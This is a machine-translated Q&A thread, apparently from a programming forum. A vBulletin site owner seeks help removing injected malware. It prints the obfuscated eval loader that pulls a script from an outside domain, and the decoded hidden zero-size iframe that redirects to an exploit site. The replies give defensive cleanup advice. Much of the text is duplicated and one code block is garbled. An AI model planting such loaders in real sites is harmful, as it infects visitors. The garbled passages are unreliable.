Javascript 从网站中删除恶意软件

我的网站3dsfroms.com已被标记为包含恶意软件的攻击网站。根据谷歌网站管理员工具，这是被注入每个页面的可疑代码：

<script>eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c ]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3 1=4.5(\'6\');1.7=\'8://9-a.b/ c.d.1\';3 2=4.e(\'2\')[0];2.f(1);',16,16,'|js|head|var|document|createElement|script|src|http|javascript|collection|in|jquery|compatibility|getElementsByTagName|appendChild'.split('|'),0,{}))</script>

[代码>eval（功能）评估（功能（p，a，c，k，c，c，k，e，e，e，r）{e=函数（c）{返回c.toString（a）}；如果（如果）如果（！.替换（/^，字符串）{而（c）当（c）当（c--）r[e（c）r[e（e，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，（c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c，c 8://9-a.b/c.d.1\'；32=4.e（\'2\'）[0]；2.f（1）|'，16,16，'| js | head | var | document | createElement | script | src | http | javascript | collection | in | jquery | compatibility | getElementsByTagName | appendChild.split（| |），0，{}） 因此，我有两个问题：

这真的是违规代码吗

我该如何移除它

我似乎无法通过vBulletin中的模板或phpmyadmin找到它，所以我不知道该怎么做

谢谢您的帮助。

将其解压缩为：

var js = document.createElement('script');
js.src = 'http://javascript-collection.in/ jquery.compatibility.js';
var head = document.getElementsByTagName('head')[0];
head.appendChild(js);

它看起来可疑（谁会混淆它？），所以我认为是的，这就是问题所在，你应该把它去掉

编辑：现在恶意站点已经备份，我可以分析其余的：它似乎添加了一个

iframe

：

var iframe = document.createElement('iframe');
iframe.src = 'http://gamessilver.in/in.cgi?walter';
iframe.width = 0;
iframe.height = 0;
iframe.vspace = 0;
iframe.hspace = 0;
iframe.frameborder = 0;
iframe.marginheight = 0;
iframe.marginwidth = 0;
var head = document.getElementsByTagName('head')[0];
head.appendChild(iframe);

把它附加到

头上有点奇怪

如果
用户代理
不易被利用，则.cgi中的
脚本似乎会重定向到谷歌。否则，它会重定向到另一个恶意网站

它继续使用许多
iframe
s分支。他们中的许多人什么都不做（尽管当时我只是在WinXP上尝试MSIE 6的
用户代理
），但最终我得到了两个Java小程序。当我反编译它们时，所有的名字都被弄乱了，我没有费心去弄清楚它在做什么。
将其解压为：

var js = document.createElement('script');
js.src = 'http://javascript-collection.in/ jquery.compatibility.js';
var head = document.getElementsByTagName('head')[0];
head.appendChild(js);

它看起来可疑（谁会混淆它？），所以我认为是的，这就是问题所在，你应该把它去掉

编辑：现在恶意站点已经备份，我可以分析其余的：它似乎添加了一个
iframe
：

var iframe = document.createElement('iframe');
iframe.src = 'http://gamessilver.in/in.cgi?walter';
iframe.width = 0;
iframe.height = 0;
iframe.vspace = 0;
iframe.hspace = 0;
iframe.frameborder = 0;
iframe.marginheight = 0;
iframe.marginwidth = 0;
var head = document.getElementsByTagName('head')[0];
head.appendChild(iframe);

把它附加到
头上有点奇怪

如果
用户代理
不易被利用，则.cgi中的
脚本似乎会重定向到谷歌。否则，它会重定向到另一个恶意网站

它继续使用许多
iframe
s分支。他们中的许多人什么都不做（尽管当时我只是在WinXP上尝试MSIE 6的
用户代理
），但最终我得到了两个Java小程序。当我反编译它们时，所有的名称都被破坏了，我没有费心去弄清楚它在做什么。
您应该做的第一件事是更改FTP或SSH登录名和密码

上述漏洞看起来像是FTP攻击。看起来要么你的操作系统更新已经过时，要么你让整个世界都在写你的文件

即使覆盖了文件，问题也可能再次出现。所以我强烈建议你检查一下

请注意有关文件的最后修改日期
检查您的FTP、SSH和访问日志，看看是否有可疑之处。
1a。立即删除对所有站点文件的写访问权限。这样做只是为了防止类似的攻击。
1b。覆盖备份中的文件
如果您使用的apache或任何Web服务器没有挂起的更新
检查您网站的文件权限
立即更改您的FTP密码
建议：将密码更改为强密码。e、 g.KLioof*（&^paswl
您应该做的第一件事是更改FTP或SSH登录名和密码

上面的漏洞看起来像是FTP攻击。看起来要么你的操作系统更新过时了，要么你让全世界都在写你的文件

即使你覆盖了你的文件，问题可能会再次出现。所以我强烈建议你检查一下

请注意有关文件的最后修改日期
检查您的FTP、SSH和访问日志，看看是否有可疑之处。
1a.立即删除对所有站点文件的写访问权限。这样做只是为了防止类似攻击。
1b.覆盖备份中的文件
如果您使用的apache或任何Web服务器没有挂起的更新
检查您网站的文件权限
立即更改您的FTP密码
建议：将密码更改为强密码。例如，KLioof*（&^paswl
它实际上隐藏在includes/functions.php的第6844行和第6845行，这两行正在用
脚本+
替换

很难找到，也很聪明。
它实际上隐藏在includes/functions.php的第6844行和第6845行，这两行正在用
脚本+
替换

很难找到，也很聪明。
我解决了这个问题。你必须在站点文件中找到并删除带有隐藏字符串的Base64函数。它从字符串中解码这个脚本。
我解决了这个问题。你必须在站点文件中找到并删除带有隐藏字符串的Base64函数。它从字符串中解码这个脚本。
这完全取决于代码。检查所有源文件。（并检查文件时间戳）这完全取决于代码。检查所有源文件。（并检查文件时间戳）谢谢你的帮助。我正在升级到vBulletin的最新版本以覆盖所有文件，希望这能击退恶意软件。不幸的是，我不太确定代码在哪里。谢谢你的帮助。我正在升级到vBulletin的最新版本以覆盖所有文件，希望这能击退恶意软件。我不是很确定不幸的是，请确定代码的位置。这也可能是vBulletin或插件中的漏洞。但如果只是为了以防万一而更改所有密码，则+1。这也可能是一次爆炸